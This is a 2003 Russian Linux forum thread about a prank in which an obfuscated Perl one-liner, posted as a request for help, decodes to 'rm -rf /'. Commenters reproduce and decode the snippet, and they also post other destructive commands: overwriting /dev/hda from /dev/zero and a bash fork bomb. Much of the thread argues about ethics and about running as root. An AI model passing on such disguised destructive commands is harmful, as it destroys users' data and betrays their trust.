LINUX.ORG.RU

ОЙ, а че это у меня музыка играть перестала после нее ?.. эт чето на мультимедию влияет ?.. щас ребутнусь и посмотрим....

anonymous
()

> вот честно, кто одним махом понял чо за код?

Хотел бы я посмотреть на такого уникума... такие есть в природе?

chroot perl -d ваш_скрипт

Идем по шагам, и все понятно.

Ps Я сам код не смотрел, все понял по постам

Sun-ch
()

2anonymous (*) (2003-09-26 18:26:02.195368)

Как написал, так и работает.

anonymous
()

> Могу еще короче: > system"rm -rf/"

а так пробовал : `rm -rf /`

[Arkady], за Korum-а

anonymous
()

2l-xoid

>мдя так опозориться и считай угробить ресурс :(((((

У Р.Феймана есть прекрасная книга "Какая разница, что думают о тебе

другие"



Sun-ch
()

2Sun-ch (*) (2003-09-26 18:30:15.427317)

Лучше

chroot ~/test perl -d ваш_скрипт

anonymous
()

а что там? ничего похожего.

anonymous
()

кто-то хитро зарабатывает на кликах.

anonymous
()

А меня вот посетила мысль поподробнее изучить perl...

P.S. Учиться лучше на чужих ошибках.

anonymous
()

>echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -' выводит exec rm -rf \

anonymous
()

Автор программки - отморозок. Если б я "догадался" эту прораммку запустить - неделя работы + десятки злык клиентов. Охуенно смешно. Не приходило в голову, что некоторые могут из за специфики работы под sudo сидеть? А модер ветки - некомпетентен, если позволяет такому треду свободно висеть.

anonymous
()
Ответ на: комментарий от anonymous

2anonymous (*) (2003-09-26 17:46:19.094381)

>Никакой не мазохизм, а истинное хакерство! Человеку было интересно
>понять, КАК ОНО РАБОТАЕТ - это и есть основа хакерства.

ИМЕННО "ПОНЯТЬ". Уже забыли, как правильно программировать. Привыкли, что комп под рукой всегда. А на бумаге "покрутить" кусок текста уже и не можем. Трах, бах, запустили, получили 100 строк ошибок, одну поправили, опять запустили... А посидеть подумать? Мозги заржавели?
Эх! Умерла старая школа программеров, которые на перфокартах свои труды на машину носили по расписанию, от силы, раз в день, а остальное время сидели над распечатками с карандашиком...

А про утюги горячие, да дерьмо в лифте, и ни чего общего с данным случаем не имеет. Почему-то не все этот код запустили. Че? Все как пуганые вороны, или очумевшие "думеры", которые и в реальной жизни прежде чем из-за угла выйти, сначала выглядывают... Да просто они не ламеры, вот и все. Я не запускал. Я не знаю перла в таком объеме, чтоб чюжие ошибки вылавливать. А чего не понимаю, на авось, ни когда не пихну в шел. Тем более из форума, да ни в жисть...

Признаюсь. Ржал я до слез. Но если честно, то мне конечно жаль парней, которые все снесли нахрен. Помолодости это бывает, и это нормально. Урок хороший будет. Десять раз потом подумают, надо ли ему su на рута. А что такое login: root навсегда забудут. Надеюсь. Если не полные дурни.

vada ★★★★★
()
Ответ на: комментарий от anonymous

anonymous (*) (2003-09-26 18:26:02.195368):

> ...хоть подскажите, где искать ответ.

Народ, да вы че...

man tr

Это НАСТОЛЬКО избитый прием - простейшее шифрование команды, только чтобы в глаза не бросалось - что, очевидно, никакого вреда дискуссия не принесет.

Вот только подсовывать этот скрипт, прося о помощи, - довольно гнусный IMHO поступок.

Die-Hard ★★★★★
()

Да забейте...

anonymous
()

Че лениво было кому набрать комманду:

perl -MO=Deparse $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see ^D

разлечит оператор ?: и s///, y/// ? или сложно прочитать что означает tr( -/:-@[-`{-})[`-{/"\-];

а именно наборы символов: -/ - от пробела до слеша :-@ - от двоеточия до ....

мне тоже было лениво :(, но просучится под ущербного юзеря я не забыл

anonymous
()

Помог, исправил, печатает... всё подряд... долго печатает :)

anonymous
()
Ответ на: комментарий от anonymous

Нормально. Просеивать наши ряды надо. А то много рутов развелось за последние годы... кстати, а что делает команда

cat /dev/zero >/dev/hda

?

anonymous
()

Объясните!!!

Я не понял: кто-то на самом деле попался? Или это ВСЁ шуточки?

anonymous
()

> Бля после запуска, Windows 3.11 с НТФС как х@ем сбрило!

Это - точно шутка.

anonymous
()

весьма милый прикол )

anonymous
()

Разобрался, вроде... Кодирование со смещением... в детстве все страдали. Соль программы: tr ' -/:-@[-`{}' '`-{/ -'

закодировать все символы от пробела до слэша в символы ` до фигурной скобки от двоеточия до @ в слэш (тут неуверен, мысли путаются, слишком много символов....) получаем что % будет e, \ будет x.... вывод команды echo '%\%#{<-{}<&{`' перенаправили на переводчик. и сохранили в $ISF. С этого момента в ISF будет Код: exec rm -rf

После этого в скрипте идет команда $ISF (т.е. то что записано в переменной ISF выполнится как команда). stderr перенаправили в /dev/null

Поправьте, где ошибся...

anonymous
()
Ответ на: комментарий от anonymous

Наверное ничего , у меня пишет No such file or directory

anonymous
()

Наверное ничего , у меня пишет No such file or directory

нет /dev/zero? что же это за система?

anonymous
()

Интересная мысль: Пользователь юникса перестаёт быть пользователем юникса если после его пользования пользованный юникс перестаёт быть юниксом. А пользователь становится просто пользователем :)

Remover
()
Ответ на: комментарий от anonymous

> нет /dev/zero? что же это за система? Нет /dev/zero имеется , нету /dev/hda

anonymous
()

> нету /dev/hda

с одной стороны, отсутствие /dev/hda - это странно.
Ведь было не "no such device", что вполне объяснимо и понятно, а @"no such file" - т.е. не было соответствующего node.

А, во-вторых, научите меня кто-нибудь как сделать так, чтобы программа вываливалась с подобным сообщением при попытке перенаправить вывод в НЕСУЩЕСТВУЮЩИЙ файл. Вместо того, чтобы просто его создать? Обычно ">@ используют именно для создания, а не для перезаписи (которую можно noclobber подавить). А создание подавить нельзя

anonymous
()
Ответ на: комментарий от anonymous

> А, во-вторых, научите меня кто-нибудь как сделать так, чтобы программа > вываливалась с подобным сообщением при попытке перенаправить вывод в > НЕСУЩЕСТВУЮЩИЙ файл. Вместо того, чтобы просто его создать? Обычно > ">@ используют именно для создания, а не для перезаписи (которую можно > noclobber подавить). А создание подавить нельзя

Шутка (неудачная) , но /dev/hda отсутствует как таковой (FreeBSD)

anonymous
()
Ответ на: комментарий от anonymous

>>Прочитал, писал капятком ;) Прикольно ;) много еще "рутов" в рунете ;)

не на долго ;)

anonymous
()

пиздец...

автор молоток! ламеров еще не так глушить нужно!!!

anonymous
()

ybludki

ya pro dolboebov kotorie ety hyinu v root syut a potom pizdat esho

anonymous
()

а я попробовал запустить под юзером, ничего, home живой, вот что писалось..:
rm: невозможно удалить `//bin': Permission denied
rm: невозможно удалить `//dev': Permission denied
rm: невозможно удалить `//etc': Permission denied
rm: невозможно удалить `//lib': Permission denied
rm: невозможно удалить `//mnt': Permission denied
rm: невозможно удалить `//opt': Permission denied
rm: невозможно удалить `//tmp': Permission denied
rm: невозможно удалить `//var': Permission denied
rm: невозможно удалить `//usr': Permission denied
rm: невозможно удалить `//boot': Permission denied
rm: невозможно удалить `//home': Permission denied
rm: невозможно удалить `//misc': Permission denied
rm: невозможно удалить `//proc': Permission denied
rm: невозможно удалить `//sbin': Permission denied
rm: невозможно удалить `//root': Permission denied
rm: невозможно удалить `//initrd': Permission denied
rm: невозможно удалить `//.autofsck': Permission denied
rm: невозможно удалить `//.fonts.cache-1': Permission denied

anonymous
()

да нет... реальная опасность есть только для тех, кто работает под root.

anonymous
()

Если бы запустил, точно бы кого-нить убил. Это ЗЛО. Это неправильно. Но смешно :).

Что ж, зато появился стимул изучить Perl, чтоб на токое не попадаться. И перестать сидеть под root'ом.

В преподали отличный урок всем. За это СПАСИБО.

anonymous
()

:(){ :|:&};:

нате вот ещё весёлую команду для bash'а ;))

Дёшево и сердито, ничего не трёт :)))

anonymous
()

А по-моему это хорошая иллюстрация к старым спорам нужно ли вводить обязательную регистрацию на lor или нет. Ответ теперь очевиден (надеюсь даже для Die-Hard'a - стороннику демократии и свободы слова для онанимного меньшинства) - нужно.
А в качестве временной меры можно предложить всем участникам игнорировать любые постинги от анонимов - в форуме, комментах и тд - если бы в данном конкретном случае следовали этому правилу, то куча гигабайт целой бы осталась.

geekkoo
()
Ответ на: комментарий от Die-Hard

эх сколько же криков! а ведь вся проблема в НЕКОМПЕТЕНТНОСТИ и отсутствии производственной этики и безопасности в работе администраторов. Ведь все знают негласные правила типа 1) не трогай продакшен машину для тестов! 2) не используй аккаунт администратора больше чем для 1-2 команд. 3) всегда имей копии. а тестировал ли ты процедуру восстановления после сбоев машины? (скорее всего даже не знаешь что это такое "бэкап" не говоря уже о том чтобы это была рабочая процедура каждый день)

и главное что наивные и доверчивые люди опять обвинят в этом Кевина Митника в том что он может вскрывать любые пароли и системы! нонсенс! все пароли и документацию люди давали ему сами - нужно было только спросить доверчивых. вот так создаются мифы о всемогущих хакерах. "разруха она в головах" (с) проф. Преображенский

anonymous
()

Нормально написанная программа должна быть легко читаемой не только ее автором.

ну а по поводу подлости, так это на совести автора.

anonymous
()

И еще - perl - х"ня. Например на tcl попробовал бы автор такую же программку написать - закодировал бы он свой rm -rf / в невразумительную последовательность символов - но все равно же было бы очевидно, что тут какая-то нае"ка, а exec в по уму настроенном tcl вообще должен отсутствовать - а на перле этот бред $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;...' выглядит вполне естественно (на мой взгляд не-перлщика).

geekkoo
()

Почему ненавидите "ламеров" и "некомпетентных"? Тут то и проявляется то к чему каждый человек склонен сам по себе, кто-то склонен помочь, а кто-то навредить. Хоть никакой разумной причины вредить и нет. Та же самая этика когда преступники дурят лохов, они их ничуть не жалеют. А завтра этим лохом окажешся ты компутерный очкарик. Всетаки по преобладанию веселящихся сделал вывод, что возрастной контингент данного форума, недалеко от 14 лет ушел.

anonymous
()

> Всетаки по преобладанию веселящихся сделал вывод, что возрастной контингент данного форума, недалеко от 14 лет ушел.

И ты среди них. Если не по возрасту, то по развитию. Грамотность - она, знаете ли, не серфингом в инете получается, а образованием.

anonymous
()

Блин, я удивляюсь какие же дебилы здесь собрались. И первый из них - дебил с претенциозным псавдонимом geekkoo. Анонимные пользователи ему не понравились. Хорошо, следующий раз помещу подобную "просьбу о помощи" от имени зарегистрированного пользователя. Создам пользователя wilfred для этой цели - даже лучше получится.
Если кто реально потерял свои данные - это будет для него хороший урок. Соблюдать правила техники безопасности. Нормальный человек на такую уловку попасться не может. А дебилов надо учить.

anonymous
()

geekkoo, поменяй псевдоним на lamerkoo или luserkoo и учи языки. Если для тебя "плохой язык" - это язык на котором МОЖНО написать непонятную программу, а хороший язык - это язык на котором ничего написать нельзя. То не волнуйся - лично для тебя все языки хорошие, если ты будешь что-нибудь писать сам (все равно ничего не напишешь) и плохие, если писать будет кто-нибудь другой (все равно ничего не поймешь). Учи Pascal и Python'ом, ругай всё остальное и не переживай. Такое поведение совершенно нормально. Для дебилов...

anonymous
()
Ответ на: комментарий от anonymous

Программу было трудно писать, поэтому ее должно быть сложно читать :)

А прикол, хоть и полезный в смысле отучения сидения под рутом (я вообще-то не ожидал, что таких админов ТАК много)... но слишком уж он рассчитан на доверие и желание помочь. То есть во вторую очередь он отучит помогать людям. Есть такие люди - кидалы, так они действуют очень похоже, только с корыстными целями. Давайте и их назовем молодцами за то, что они нас учат быть не такими лохами? А сами станем параноидально осторожными и недоверчивыми. Бля... как жить станет интересно, прохожие на улицах: пробежка-выстрел-перекат-выстрел :)))

anonymous
()

Программу было трудно писать, поэтому ее должно быть сложно читать :)

А прикол, хоть и полезный в смысле отучения сидения под рутом (я вообще-то не ожидал, что таких админов ТАК много)... но слишком уж он рассчитан на доверие и желание помочь. То есть во вторую очередь он отучит помогать людям. Есть такие люди - кидалы, так они действуют очень похоже, только с корыстными целями. Давайте и их назовем молодцами за то, что они нас учат быть не такими лохами? А сами станем параноидально осторожными и недоверчивыми. Бля... как жить станет интересно, прохожие на улицах: пробежка-выстрел-перекат-выстрел :)))

anonymous
()

> Есть такие люди - кидалы, так они действуют очень похоже, только с корыстными целями.

Это другое дело. там люди свою работу делают. а у нас всякий труд почетен.

anonymous
()

Perl и дятлы

я всегда думал что язык програмирования не должен скрывать алгоритм программы. А как бы даже наоборот :-( А вот эти кайфы от эзотерических трюков... прям самолюбование какоето... причем здесь программирование?

anonymous
()

Ну в configure скрипт терь кто нить сунет эту хрень, вот будет весело

Ну в configure скрипт терь кто нить сунет эту хрень, вот будет весело

anonymous
()

>Если бы запустил, точно бы кого-нить убил. Это ЗЛО. Это неправильно. >Но смешно :).

>Что ж, зато появился стимул изучить Perl, чтоб на токое не попадаться. >И перестать сидеть под root'ом.

А так же вспомнить,что слова "Резервное копирование" или "backup", - это не просто слова,а очень нужная штука...Ж-)))

>В преподали отличный урок всем. За это СПАСИБО.

Кстати о копировании...Может кто подскажет как в Винде (NT, 2000) эабыкапить юзверей с паролями...потомучто наша начальница ничего кроме ЭНТИ не знает...и сервера приходится делать на винде....(на UNIX'e таких проблем нема....а вот на винде.....)на серверах сотни пользователей с 14-ти значными паролями...и...если полетит-будет горе....бессоные ночи,злые тётки...и тп...

anonymous
()

Странно это всё. С одной стороны автор/постер прав - не умеешь работать -- УЧИСЬ!!! Уж мне поверьте - работаю администратором/восстановителем (частный сектор - паяем/починяем). НЕспециалистов много, нет ОЧЕНЬ много. Это обидно. С другой стороны - конечно подлость, причём на хороших чувствах построенная. Типа помогите. Хотя опять же - стань специалистом - потом кидайся помогать другим. И снова - как стать специалистом не набив шишек. Хотя одно дело когда сам треснулся, и совсем другое когда тебя сковородкой шарахнули. Скажем так - смех сквозь слёзы.

Всех с новым годом (шана това), удачи... Ни дня без строчки.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.